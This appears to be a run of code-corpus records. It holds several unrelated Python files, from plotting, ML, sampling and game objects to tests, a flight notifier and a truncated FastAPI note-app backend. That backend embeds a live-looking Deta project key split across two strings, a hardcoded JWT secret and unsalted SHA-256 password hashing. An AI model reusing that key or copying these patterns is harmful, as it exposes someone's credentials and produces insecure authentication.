self.sizer2.Add(self.class_label, 0, border=myHeader.CTRL_SPACING, flag=wx.ALL | wx.EXPAND )\n self.sizer2.Add(self.product_label, 0, border=myHeader.CTRL_SPACING, flag=wx.ALL | wx.EXPAND )\n self.sizer2.Add(self.serial_num_label, 0, border=myHeader.CTRL_SPACING, flag=wx.ALL | wx.EXPAND )\n\n self.sizer3.Add(self.meter_size_label, 0, border=myHeader.CTRL_SPACING, flag=wx.ALL | wx.EXPAND )\n self.sizer3.Add(self.rate_unit_label, 0, border=myHeader.CTRL_SPACING, flag=wx.ALL | wx.EXPAND )\n self.sizer3.Add(self.total_unit_label, 0, border=myHeader.CTRL_SPACING, flag=wx.ALL | wx.EXPAND )\n\n self.sizer6.Add(self.software_rev_label, 0, border=myHeader.CTRL_SPACING, flag=wx.ALL | wx.EXPAND )\n self.sizer6.Add(self.nom_k_label, 0, border=myHeader.CTRL_SPACING, flag=wx.ALL | wx.EXPAND )\n self.sizer6.Add(self.k_label, 0, border=myHeader.CTRL_SPACING, flag=wx.ALL | wx.EXPAND )\n\n self.sizer7.Add(self.AO_label, 0, border=myHeader.CTRL_SPACING, flag=wx.ALL | wx.EXPAND )\n self.sizer7.Add(self.fsadc_label, 0, border=myHeader.CTRL_SPACING, flag=wx.ALL | wx.EXPAND )\n self.sizer7.Add(self.zradc_label, 0, border=myHeader.CTRL_SPACING, flag=wx.ALL | wx.EXPAND )\n\n self.SetSizer(self.sizer1)\n self.Layout()\n #----------------------------------\n # GUI Ctrl Initializations\n #----------------------------------\n self.SetupLabels()\n self.InitializePlot()\n self.ClearAxes()\n #----------------------------------\n # Events\n #----------------------------------\n\n def SetYLimits(self, y_min, y_max, index=myPlot.AXES_INDEX_DEFAULT):\n self.figure.SetYLimits(y_min, y_max, index=index)\n \n def SetXLimits(self, x_min, x_max, index=myPlot.AXES_INDEX_DEFAULT):\n self.figure.SetXLimits(x_min, x_max, index=index)\n\n def SetXLabel(self, label, index=myPlot.AXES_INDEX_DEFAULT):\n self.figure.SetXLabel(label, index=index)\n \n def SetYLabel(self, label, index=myPlot.AXES_INDEX_DEFAULT):\n self.figure.SetYLabel(label, index=index)\n\n def ClearAxes(self): \n self.figure.ClearAxes()\n self.figure.Draw()\n\n def PlotSpecLimits(self, target, spec, rates, index=myPlot.AXES_INDEX_DEFAULT):\n self.figure.PlotSpecLimits(target, spec, rates, index=index)\n\n def MultiPointErrorBar(self, num_test_replicates, index=myPlot.AXES_INDEX_DEFAULT):\n assert type(num_test_replicates) == types.ListType\n self.figure.MultiPointErrorBar(num_test_replicates, index=index)\n\n def ErrorBar(self, xy_data, y_err, index=myPlot.AXES_INDEX_DEFAULT):\n assert type(xy_data) == types.TupleType\n self.figure.ErrorBar(xy_data, y_err, index=index)\n\n def Plot(self, xy_data, index=myPlot.AXES_INDEX_DEFAULT):\n assert type(xy_data) == types.TupleType\n self.figure.Scatter(xy_data,\n myPlot.MARKER_SHAPE,\n myPlot.MARKER_SIZE,\n myPlot.MARKER_FACE_COLOR,\n myPlot.MARKER_EDGE_COLOR,\n myPlot.MARKER_EDGE_WIDTH,\n myPlot.ALPHA_SCATTER,\n index=index)\n \n def AppendPlot(self, xy_data, index=myPlot.AXES_INDEX_DEFAULT):\n assert type(xy_data) == types.TupleType\n self.figure.AppendData(xy_data,\n myPlot.MARKER_SHAPE,\n myPlot.MARKER_SIZE,\n myPlot.MARKER_FACE_COLOR,\n myPlot.MARKER_EDGE_COLOR,\n myPlot.MARKER_EDGE_WIDTH,\n myPlot.ALPHA_SCATTER,\n index=index)\n\n def SaveFigure(self, path):\n self.figure.SaveFigure(path)\n\n def RescaleImage(self, scale, path):\n self.figure.RescaleImage(path, scale)\n \n def InitializePlot(self): \n self.figure.Initialize()\n self.figure.SetXLabel(r'Flow Rate (gpm)')\n self.figure.SetYLabel(r'Error (%Reading)')\n self.figure.Draw()\n \n def SetupLabels(self):\n self.class_label.SetLabel(label='Class: ')\n self.product_label.SetLabel(label='Type: ')\n self.serial_num_label.SetLabel(label='Serial #: ')\n self.meter_size_label.SetLabel(label='Size: (in)')\n self.software_rev_label.SetLabel(label='Rev: ')\n self.nom_k_label.SetLabel(label='Nominal K: (ppg)')\n self.fsadc_label.SetLabel(label='FSADC: ')\n self.zradc_label.SetLabel(label='ZRADC: ')\n self.AO_label.SetLabel('AO: (mA)')\n self.rate_unit_label.SetLabel(label='Rate Unit: ')\n self.total_unit_label.SetLabel(label='Total Unit: ')\n\n def HideLabels(self):\n self.labels_panel.Show(False)\n self.Layout()\n \n def ShowLabels(self):\n self.labels_panel.Show(True)\n self.Layout()\n \n def Draw(self):\n self.figure.Draw()\n","sub_path":"GUI/MeterPanel.py","file_name":"MeterPanel.py","file_ext":"py","file_size_in_byte":13563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"308984350","text":"\n# coding: utf-8\n\n# In[12]:\n\n\nimport math\nimport numpy as np\nimport random\nfrom sklearn import manifold\nfrom keras.layers import Input, Dense,Dropout\nfrom keras.models import Model\nimport matplotlib.pyplot as plt \nimport datetime\n\n\n# In[13]:\n\n\ninput_matrix = 'simulate.txt'\ninput_label = 'simulate_label.txt'\n\n\n# In[15]:\n\n\ndat = np.loadtxt(input_matrix)\nX =dat.T\nM = np.shape(X)[0]\nN = np.shape(X)[1]\nprint(\"Cell numbers: \" + str(M))\nprint(\"Gene numbers: \" + str(N))\n \nf = open(input_label)\ntemp = f.read().splitlines()\nf.close()\nlabels=[]\nfor t in temp:\n labels.append(eval(t))\n\nm = len(set(labels))\nprint(\"Cell types: \" + str(m))\n\nlabel_set = []\nfor n in labels:\n if n not in label_set:\n label_set.append(n)\nprint(label_set)\n \nY = np.log2(X+1)\n\n\n# In[20]:\n\n\nif __name__ == '__main__':\n def DAE_t_SNE(matrix = input_matrix, label = input_label, n1 = N, n2 = N//10, \n n3 = max(N//100, 30),test_set_percent = 0.1, encoding_dim = 30,\n drop = 0.5, activation = 'relu',optimizer = 'adam', loss = 'mse', \n epoch = 50, batch_size=10):\n start_time = datetime.datetime.now() \n\n X_test = pd.DataFrame(Y).sample(frac=test_set_percent)\n X_train = pd.DataFrame(Y).drop(X_test.index)\n \n input = Input(shape=(n1,))\n input_corrupted = Dropout(drop)(input)\n\n encoded_1 = Dense(n2, activation = activation)(input_corrupted)\n encoded_2 = Dense(n3, activation = activation)(encoded_1)\n encoder_output = Dense(encoding_dim,activation = activation )(encoded_2)\n\n decoded_1 = Dense(n3, activation = activation)(encoder_output)\n decoded_2 = Dense(n2, activation = activation)(decoded_1)\n decoder_output = Dense(n1, activation = activation)(decoded_2)\n \n autoencoder = Model(input, decoder_output)\n encoder = Model(input, encoder_output)\n autoencoder.compile(optimizer = optimizer, loss = loss)\n hist = autoencoder.fit(X_train, X_train, epochs = epoch, batch_size = batch_size,\n shuffle=True, validation_data=(X_test, X_test))\n lowdim = encoder.predict(Y)\n \n def apply_tSNE(X):\n tsne = manifold.TSNE(n_components=2);\n X_tsne = tsne.fit_transform(X);\n return X_tsne\n DAE_tSNE = apply_tSNE(lowdim)\n np.save(\"DAE-t-SNE_simulate.npy\",DAE_tSNE)\n np.savetxt(\"DAE-t-SNE_simulate.txt\",DAE_tSNE) \n \n finish_time = datetime.datetime.now()\n print(\"DAE-t-SNE total time taken = \"+ str(finish_time - start_time))\n \n\n\n# In[21]:\n\n\nDAE_t_SNE()\n\n\n# In[23]:\n\n\nDAE_tSNE = np.load(\"DAE-t-SNE_simulate.npy\")\nc_basic = ['b', 'g', 'r', 'c', 'm', 'y', 'k', 'w']\nc_advanced = ['aliceblue', 'antiquewhite', 'aqua', 'aquamarine', 'azure', 'beige', 'bisque', 'black', \n 'blanchedalmond', 'blue', 'blueviolet', 'brown', 'burlywood', 'cadetblue', 'chartreuse', \n 'chocolate', 'coral', 'cornflowerblue', 'cornsilk', 'crimson', 'cyan', 'darkblue', \n 'darkcyan', 'darkgoldenrod', 'darkgray', 'darkgreen', 'darkgrey', 'darkkhaki', 'darkmagenta',\n 'darkolivegreen', 'darkorange', 'darkorchid', 'darkred', 'darksalmon', 'darkseagreen', \n 'darkslateblue', 'darkslategray', 'darkslategrey', \n 'darkturquoise', 'darkviolet', 'deeppink', 'deepskyblue', 'dimgray', 'dimgrey', \n 'dodgerblue', 'firebrick', 'floralwhite', 'forestgreen', 'fuchsia', 'gainsboro',\n 'ghostwhite', 'gold', 'goldenrod', 'gray', 'green', 'greenyellow', 'grey', \n 'honeydew', 'hotpink', 'indianred', 'indigo', 'ivory', 'khaki', 'lavender', \n 'lavenderblush', 'lawngreen', 'lemonchiffon', 'lightblue', 'lightcoral', \n 'lightcyan', 'lightgoldenrodyellow', 'lightgray', 'lightgreen', 'lightgrey', \n 'lightpink', 'lightsalmon', 'lightseagreen', 'lightskyblue', 'lightslategray', \n 'lightslategrey', 'lightsteelblue', 'lightyellow', 'lime', 'limegreen', 'linen',\n 'magenta', 'maroon', 'mediumaquamarine', 'mediumblue', 'mediumorchid', \n 'mediumpurple', 'mediumseagreen', 'mediumslateblue', 'mediumspringgreen', \n 'mediumturquoise', 'mediumvioletred', 'midnightblue', 'mintcream', 'mistyrose', \n 'moccasin', 'navajowhite', 'navy', 'oldlace', 'olive', 'olivedrab', 'orange', \n 'orangered', 'orchid', 'palegoldenrod', 'palegreen', 'paleturquoise', \n 'palevioletred', 'papayawhip', 'peachpuff', 'peru', 'pink', 'plum', 'powderblue',\n 'purple', 'rebeccapurple', 'red', 'rosybrown', 'royalblue', 'saddlebrown',\n 'salmon', 'sandybrown', 'seagreen', 'seashell', 'sienna', 'silver', 'skyblue', \n 'slateblue', 'slategray', 'slategrey', 'snow', 'springgreen', 'steelblue', 'tan',\n 'teal', 'thistle', 'tomato', 'turquoise', 'violet', 'wheat', 'white', \n 'whitesmoke', 'yellow', 'yellowgreen']\nc_shuffled= random.sample(c_advanced,len(c_advanced))\nc = c_basic + c_shuffled\nindex = []\nfor i in range(m):\n index.append([x == label_set[i] for x in labels])\n \nfor i in range(m):\n plt.scatter(DAE_tSNE[index[i],0], DAE_tSNE[index[i],1],c=c[i],label = label_set[i])\nplt.legend(bbox_to_anchor=(1.25,0.35))\nplt.title(\"DAE-t-SNE\")\nplt.show()\n \n\n","sub_path":"Code/DAE-t-SNE.py","file_name":"DAE-t-SNE.py","file_ext":"py","file_size_in_byte":5531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"198422301","text":"import uuid\n\nfrom django.test import TestCase\n\nfrom .models import *\n\nclass UserTests(TestCase):\n def test_validate_id(self):\n # Tests a valid ID\n id = uuid.uuid4()\n user = User(id = id)\n user.validate_id()\n\n id = 0xABAB\n user = User(id = id)\n with self.assertRaises(Exception):\n user.validate_id()\n\nclass UserFactoryTests(TestCase):\n def test_build(self):\n personal_data = UserPersonalData(\n username = \"Tester\",\n first_name = \"Testerman\",\n last_name = \"Testerson\",\n email = \"testerman@example.com\"\n )\n base_permissions = UserBasePermissions(\n is_staff = False,\n is_active = False\n )\n user = UserFactory.build_entity_with_id(personal_data, base_permissions)\n user.validate_id()\n\n\n","sub_path":"bank_ddd_demo/domain/users/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"428324991","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport cv2\r\nimport random\r\nimport pickle\r\n\r\nDATADIR = r'E:\\Study\\Year 4\\FYP\\images\\dataset_scaffold'\r\nCATEGORIES = ['Good', 'Bad']\r\n\r\nIMG_SIZE = 480\r\n\r\ntraining_data = []\r\n\r\n\r\ndef erode(img, ite_time):\r\n kernel = np.ones((5, 5), np.uint8)\r\n img_ero = cv2.erode(img, kernel, iterations=ite_time)\r\n\r\n return img_ero\r\n\r\n\r\ndef dilation(img, ite_time):\r\n kernel = np.ones((5, 5), np.uint8)\r\n img_dila = cv2.dilate(img, kernel, iterations=ite_time)\r\n\r\n return img_dila\r\n\r\n\r\ndef ero_dila(img, ite_time):\r\n img = erode(img, ite_time)\r\n\r\n return dilation(img, ite_time)\r\n\r\n\r\ndef handle_img(img):\r\n ret, thresh2 = cv2.threshold(img, 127, 255, cv2.THRESH_BINARY_INV)\r\n \r\n return ero_dila(thresh2, 2)\r\n\r\n\r\ndef create_training_data():\r\n for category in CATEGORIES:\r\n path = os.path.join(DATADIR, category)\r\n clas_num = CATEGORIES.index(category)\r\n\r\n for img in os.listdir(path):\r\n try:\r\n img_array = cv2.imread(os.path.join(path, img), 0)\r\n img_array = handle_img(img_array)\r\n new_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))\r\n\r\n training_data.append([new_array, clas_num])\r\n except Exception as e:\r\n pass\r\n\r\n\r\ncreate_training_data()\r\n\r\nrandom.shuffle(training_data)\r\n\r\nX = [] # features\r\ny = [] # labels\r\n\r\nfor features, label in training_data:\r\n X.append(features)\r\n y.append(label)\r\n\r\nX = np.array(X).reshape(-1, IMG_SIZE, IMG_SIZE, 1)\r\n\r\n# save model\r\npickle_out = open(\"X.pickle\", \"wb\")\r\npickle.dump(X, pickle_out)\r\npickle_out.close()\r\n\r\npickle_out = open(\"y.pickle\", \"wb\")\r\npickle.dump(y, pickle_out)\r\npickle_out.close()\r\n","sub_path":"load_dataset.py","file_name":"load_dataset.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"411227428","text":"# -*- coding: utf-8 -*-\n\"\"\"\nWeapons\n\nНаш пока простенький класс для объектов-оружия\n\n\"\"\"\n\nfrom typeclasses.objects import Object\nfrom evennia.utils import utils, create, search, prettytable\nfrom django.core.exceptions import ObjectDoesNotExist\n\nfrom evennia import create_object\nfrom django.conf import settings\n\n\nclass Weapon(Object):\n \"\"\"\n Основной класс для оружия, здесь будем править return_appearence\n durability - прочность оружия, количество убиств которое можно им совершить.\n is_weapon - флаг обозначающий, что передмет является оружием, т.е. этим пердметом можно убить.\n \"\"\"\n def at_object_creation(self):\n #добавляем прочность нашему оружию(int)\n self.db.durability = 0\n #и говорим что наш предмет оружие(bool)\n self.db.is_weapon = True\n #добавим часть тела, куда одевается предмет\n #self.db.placing = \"RightHand\"\n\n def return_appearance(self, looker):\n \"\"\"\n Оверрайд отображения описания объекта\n \"\"\"\n if not looker:\n return\n # get and identify all objects\n visible = (con for con in self.contents if con != looker and\n con.access(looker, \"view\"))\n exits, users, things = [], [], []\n for con in visible:\n key = con.get_display_name(looker)\n if con.destination:\n exits.append(key)\n elif con.has_player:\n users.append(\"{c%s{n\" % key)\n else:\n things.append(key)\n # get description, build string\n string = \"{c%s{n\\n\" % self.get_display_name(looker)\n desc = self.db.desc\n durability = self.db.durability\n if desc:\n string += \"%s\" % desc\n if things:\n string += \"\\n{wКомплектующие:{n \" + \", \".join(users + things)\n if durability:\n string += \"\\n{wЗапас прочности: %s{n \" % durability\n return string\n\nclass Knife(Weapon):\n\n def at_object_creation(self):\n #добавляем прочность нашему оружию(int)\n self.db.durability = 1\n self.db.is_weapon = True\n #self.db.placing = \"RightHand\"\n self.db.desc = \"Картонный нож. Достаточно прочный что убить кого-то... один раз.\"\n\nclass AcidBottle(Weapon):\n\n\n def at_object_creation(self):\n #добавляем прочность нашему оружию(int)\n self.db.durability = 3\n self.db.is_weapon = True\n #добавим часть тела, куда одевается предмет\n #self.db.placing = \"RightHand\"\n self.db.desc = \"Банка с серной кислотой. Можно облить кого-нить и наблюдать, как он подыхает.\"\n\nclass Pistol(Weapon):\n\n def at_object_creation(self):\n #добавляем прочность нашему оружию(int)\n self.db.durability = 50\n self.db.is_weapon = True\n #добавим часть тела, куда одевается предмет\n #self.db.placing = \"RightHand\"\n self.db.desc = \"Пистолет ТТ.\"\n mag = create_object(settings.BASE_OBJECT_TYPECLASS, \"Магазин на 12 патронов\", self, home=self)\n mag.db.desc = \"Магазин на 12 патронов\"\n\n\n","sub_path":"typeclasses/weapons.py","file_name":"weapons.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"636379063","text":"# mtr.py\nimport numpy as np \nimport numpy.random as rd\nimport matplotlib.pyplot as plt\n\nclass Metropolis:\n def __init__(self, pLarge, sigma):\n self.pLarge = pLarge # probability of large step\n self.sigma = sigma # standard deviation of perturbation\n\n def sample(self, func, dim, nSamples):\n samples = []\n prevSample = rd.rand(dim)\n prevVal = func(prevSample)\n total = 0\n while total < nSamples:\n newSample = self.__mutate(prevSample, dim)\n newVal = func(newSample)\n if newVal < prevVal:\n if prevVal == 0: # newVal = preVal = 0, must try again\n continue\n elif rd.rand() > newVal / prevVal:\n samples.append(prevSample) # reject new sample\n total += 1\n continue\n # otherwise accept\n prevSample = newSample\n prevVal = newVal\n samples.append(newSample) \n total += 1\n return np.array(samples)\n\n # Input a function of samples in primary sample space and get the minimum cost\n def anneal(self, func, dim, r, T, T_min, nIte):\n # Initialize samples\n prevSample = rd.rand(dim)\n bestSample = prevSample\n prevVal = func(prevSample)\n bestVal = prevVal\n\n # Begin annealing loop\n curT = T\n print(\"Begin annealing\")\n while curT > T_min:\n print(\"T:\", curT)\n for _ in range(nIte):\n # Generate new sample\n curSample = self.__mutate(prevSample, dim)\n\n # Record if best solution so far is found\n curVal = func(curSample)\n if curVal < bestVal:\n prevVal = bestVal = curVal\n prevSample = bestSample = curSample\n print(\"Best:\", bestVal)\n continue\n\n # Accept samples or not\n dE = curVal - prevVal\n if dE < 0 or (dE > 0 and rd.rand() < np.exp(-dE / curT)):\n prevVal = curVal\n prevSample = curSample\n print(\"Accepted: \", curVal)\n\n curT *= r # anneal\n\n return bestVal, bestSample\n\n def __mutate(self, sample, dim):\n if rd.rand() < self.pLarge: # large step\n return rd.rand(dim)\n else: # small step\n return self.__wrap(sample + rd.randn(dim) * self.sigma, 0, 1)\n\n @staticmethod\n def __wrap(val, low, high):\n step = high - low\n ret = []\n for v in val:\n if v < low:\n while v < low:\n v += step\n elif v >= high:\n while v >= high:\n v -= step\n ret.append(v)\n return np.array(ret)\n\nif __name__ == '__main__':\n mtr = Metropolis(0.1, 0.005)\n print(mtr.anneal(lambda x: 7 * np.sin(8 * x) + 6 * np.cos(5 * x), 1, 0.9, 1, 0.01, 100))\n X = mtr.sample(lambda x: np.sin(np.pi * x), 1, 10000)\n plt.hist(np.transpose(X).tolist())\n plt.show()\n","sub_path":"_ModelTest/mtr.py","file_name":"mtr.py","file_ext":"py","file_size_in_byte":3101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"544886861","text":"########################################################################\n#\n# Created: June 22, 2021\n# Author: The Blosc development team - blosc@blosc.org\n#\n########################################################################\nimport random\n\nimport numpy\nimport pytest\n\nimport blosc2\n\n\n@pytest.mark.parametrize(\"contiguous\", [True, False])\n@pytest.mark.parametrize(\"urlpath\", [None, \"b2frame\"])\n@pytest.mark.parametrize(\n \"nchunks, ninserts\",\n [\n (0, 3),\n (1, 1),\n (10, 3),\n (15, 17),\n ],\n)\n@pytest.mark.parametrize(\"copy\", [True, False])\n@pytest.mark.parametrize(\"create_chunk\", [True, False])\ndef test_schunk_insert_numpy(contiguous, urlpath, nchunks, ninserts, copy, create_chunk):\n storage = {\n \"contiguous\": contiguous,\n \"urlpath\": urlpath,\n \"cparams\": {\"nthreads\": 2, \"typesize\": 4},\n \"dparams\": {\"nthreads\": 2},\n }\n blosc2.remove_urlpath(urlpath)\n\n schunk = blosc2.SChunk(chunksize=200 * 1000 * 4, **storage)\n for i in range(nchunks):\n buffer = i * numpy.arange(200 * 1000, dtype=\"int32\")\n nchunks_ = schunk.append_data(buffer)\n assert nchunks_ == (i + 1)\n\n for i in range(ninserts):\n pos = random.randint(0, nchunks + i)\n buffer = pos * numpy.arange(200 * 1000, dtype=\"int32\")\n if create_chunk:\n chunk = blosc2.compress2(buffer)\n schunk.insert_chunk(pos, chunk)\n else:\n schunk.insert_data(pos, buffer, copy)\n chunk_ = schunk.decompress_chunk(pos)\n bytes_obj = buffer.tobytes()\n assert chunk_ == bytes_obj\n\n dest = numpy.empty(buffer.shape, buffer.dtype)\n schunk.decompress_chunk(pos, dest)\n assert numpy.array_equal(buffer, dest)\n\n for i in range(nchunks + ninserts):\n schunk.decompress_chunk(i)\n\n blosc2.remove_urlpath(urlpath)\n\n\n@pytest.mark.parametrize(\"contiguous\", [True, False])\n@pytest.mark.parametrize(\"urlpath\", [None, \"b2frame\"])\n@pytest.mark.parametrize(\n \"nchunks, ninserts\",\n [\n (0, 3),\n (1, 1),\n (10, 3),\n (15, 17),\n ],\n)\n@pytest.mark.parametrize(\"copy\", [True, False])\n@pytest.mark.parametrize(\"create_chunk\", [True, False])\ndef test_insert(contiguous, urlpath, nchunks, ninserts, copy, create_chunk):\n storage = {\n \"contiguous\": contiguous,\n \"urlpath\": urlpath,\n \"cparams\": {\"nthreads\": 2, \"typesize\": 1},\n \"dparams\": {\"nthreads\": 2},\n }\n\n blosc2.remove_urlpath(urlpath)\n nbytes = 23401\n\n schunk = blosc2.SChunk(chunksize=nbytes * 2, **storage)\n for i in range(nchunks):\n bytes_obj = b\"i \" * nbytes\n nchunks_ = schunk.append_data(bytes_obj)\n assert nchunks_ == (i + 1)\n\n for i in range(ninserts):\n pos = random.randint(0, nchunks + i)\n bytes_obj = b\"i \" * nbytes\n if create_chunk:\n chunk = blosc2.compress2(bytes_obj, **storage[\"cparams\"])\n schunk.insert_chunk(pos, chunk)\n else:\n schunk.insert_data(pos, bytes_obj, copy)\n res = schunk.decompress_chunk(pos)\n assert res == bytes_obj\n\n for i in range(nchunks + ninserts):\n schunk.decompress_chunk(i)\n\n blosc2.remove_urlpath(urlpath)\n","sub_path":"tests/test_schunk_insert.py","file_name":"test_schunk_insert.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"580629300","text":"from data_manager import DataManager\r\nfrom datetime import datetime, timedelta\r\nfrom flight_search import FlightSearch\r\nfrom notification_manager import NotificationManager\r\n\r\ndata_manager = DataManager()\r\nsheet_data = data_manager.get_destination_data()\r\nflight_search = FlightSearch()\r\nnotification_manager = NotificationManager()\r\n# print(sheet_data)\r\n\r\nORIGIN_CITY_IATA = \"LON\"\r\n#Check IATACODE in database by using Flight_Search.\r\n\r\nif sheet_data[0][\"iataCode\"] == \"\":\r\n from flight_search import FlightSearch\r\n flight_search = FlightSearch()\r\n for row in sheet_data:\r\n row[\"iataCode\"] = flight_search.get_destination_code(row[\"city\"])\r\n print(f\"sheet_data:\\n{sheet_data}\")\r\n\r\n data_manager.destination_data = sheet_data\r\n data_manager.update_destination_code()\r\n\r\n\r\ntomorrow = datetime.now() + timedelta(days=1)\r\nsix_month_from_today = datetime.now() + timedelta(days=(6*30))\r\n\r\nfor destination in sheet_data:\r\n flight = flight_search.check_flights(\r\n ORIGIN_CITY_IATA,\r\n destination[\"iataCode\"],\r\n from_time=tomorrow,\r\n to_time=six_month_from_today\r\n )\r\n # print(flight.price)\r\n try:\r\n if flight.price < destination[\"lowestPrice\"]:\r\n notification_manager.send_email(\r\n message=f\"Low price alert! Only {flight.price} to fly from {flight.origin_city}-{flight.origin_airport} \"\r\n f\"to {flight.destination_city}-{flight.destination_airport}, from {flight.out_date} to \"\r\n f\"{flight.return_date}.\"\r\n )\r\n except (TypeError, AttributeError):\r\n continue\r\n\r\n\r\n","sub_path":"API Flight/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"573316932","text":"from fastapi import FastAPI, File, UploadFile, Response, Header\nfrom fastapi.responses import FileResponse\nfrom typing import Optional\nfrom deta import Deta\nfrom pydantic import BaseModel\nimport hashlib\nimport jwt\nimport uuid\nimport json\nfrom datetime import datetime, timedelta\nfrom fastapi import File, UploadFile\nfrom fastapi.responses import HTMLResponse, StreamingResponse\nfrom fastapi.middleware.cors import CORSMiddleware\n\n# pydantic to declare body of put or post\napp = FastAPI()\na = \"c02ff9ee_aRR2Gi3m4xe76\"\ndeta = Deta(a+\"F8txNbk77WqghL4nKKs\")\n\norigins = [\"*\"]\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\ndef validateToken(token):\n try:\n validation = jwt.decode(token, 'UnaiSimon', algorithms=\"HS256\")\n return True\n except:\n return False\n\n\n@app.get(\"/\")\ndef read_root():\n return {\"message\": \"Let's get Started\"}\n\nclass User(BaseModel):\n fName: str\n lName: str\n username: str\n email: str\n password: str\n\n@app.post(\"/api/signup\")\ndef signup(user: User):\n \n userdb = deta.Base(\"Notecaster_User\")\n \n #hash the password\n user.password = hashlib.sha256(user.password.encode()).hexdigest()\n \n createUser = {\n \"fName\": user.fName,\n \"lName\": user.lName,\n \"username\": user.username,\n \"email\": user.email,\n \"password\": user.password\n }\n \n try:\n newuser = userdb.insert(createUser, user.username)\n except:\n return({\n \"status\": 409,\n \"message\": \"User already exists.\"\n })\n \n JWT_SECRET = 'UnaiSimon'\n JWT_ALGORITHM = 'HS256'\n JWT_EXP_DELTA_SECONDS = 2628000\n payload = {'exp': datetime.utcnow() + timedelta(seconds=JWT_EXP_DELTA_SECONDS)} \n jwt_token = jwt.encode(payload, JWT_SECRET, JWT_ALGORITHM)\n \n return({\n \"status\": 201,\n \"message\": \"User created successfully.\",\n \"token\": jwt_token,\n \"key\": user.username,\n \"fName\": user.fName,\n \"lName\": user.lName,\n \"username\": user.username,\n \"email\": user.email,\n })\n \n \nclass Login(BaseModel):\n username: str\n password: str\n \n@app.post(\"/api/login\")\ndef loginUser(login: Login):\n username = login.username\n password = login.password\n hashedPassword = hashlib.sha256(login.password.encode()).hexdigest()\n userdb = deta.Base(\"Notecaster_User\")\n \n #check if username exists\n theUser = next(userdb.fetch({\"username\": username}))\n if len(theUser) == 0:\n return({\n \"status\": 404,\n \"message\": \"Username does not exist.\"\n })\n \n theUser = theUser[0]\n \n #check password\n if theUser['password'] != hashedPassword:\n return({\n \"status\": 403,\n \"message\": \"Password does not match.\"\n })\n \n #generate token\n JWT_SECRET = 'UnaiSimon'\n JWT_ALGORITHM = 'HS256'\n JWT_EXP_DELTA_SECONDS = 2628000\n payload = {'exp': datetime.utcnow() + timedelta(seconds=JWT_EXP_DELTA_SECONDS)} \n jwt_token = jwt.encode(payload, JWT_SECRET, JWT_ALGORITHM)\n \n return({\n \"status\": 200,\n \"message\": \"Successfully Logged In.\",\n \"token\": jwt_token,\n \"fName\": theUser['fName'],\n \"lName\": theUser['lName'],\n \"username\": theUser['username'],\n \"email\": theUser['email'],\n })\n \nclass Subject(BaseModel):\n username: str\n name: str\n about: str\n\n@app.post(\"/api/subjects\")\ndef createproject(subject: Subject, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n name = subject.name\n about = subject.about\n username = subject.username\n \n subjectdb = deta.Base(\"Notecaster_Subject\")\n \n createSubject = {\n \"username\": username,\n \"name\": name,\n \"about\": about\n }\n \n try:\n newSubject = subjectdb.insert(createSubject)\n return newSubject\n \n except:\n return({\n \"status\": 500,\n \"message\": \"Some Error Occurred.\"\n })\n \n@app.get(\"/api/subjects/{username}\")\ndef getprojects(username: str, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n subjectdb = deta.Base(\"Notecaster_Subject\")\n allSubjects = next(subjectdb.fetch({\"username\": username}))\n return allSubjects\n\n@app.get(\"/api/subject/{key}\")\ndef getproject(key: str, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n try:\n subjectdb = deta.Base(\"Notecaster_Subject\")\n theSubject = subjectdb.get(key)\n return theSubject\n \n except:\n return({\n \"status\": 404,\n \"message\": \"Project Does not Exist\"\n })\n\n@app.put(\"/api/subject/{key}\")\ndef updateproject(key: str, subject: Subject, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n try:\n subjectdb = deta.Base(\"Notecaster_Subject\")\n theSubject = subjectdb.get(key)\n theSubject['name'] = subject.name\n theSubject['about'] = subject.about\n theSubject = subjectdb.put(theSubject)\n return theSubject\n \n except:\n return({\n \"status\": 404,\n \"message\": \"Project Does not Exist\"\n })\n\n@app.delete(\"/api/subject/{key}\")\ndef getproject(key: str, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n try:\n subjectdb = deta.Base(\"Notecaster_Subject\")\n subjectdb.delete(key)\n return ({\n \"status\": 203,\n \"message\": \"Deleted Successfully.\"\n })\n \n except:\n return({\n \"status\": 404,\n \"message\": \"Project Does not Exist\"\n })\n\n@app.put(\"/api/subjectimage/{key}\")\ndef updateImage(key: str = \"\", file: UploadFile = File(...), Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n subjectDrive = deta.Drive(\"Notecaster_Subject\")\n \n fileName = str(uuid.uuid4())\n fileExtension = file.filename.split(\".\")[1]\n fileName += \".\"+fileExtension\n \n 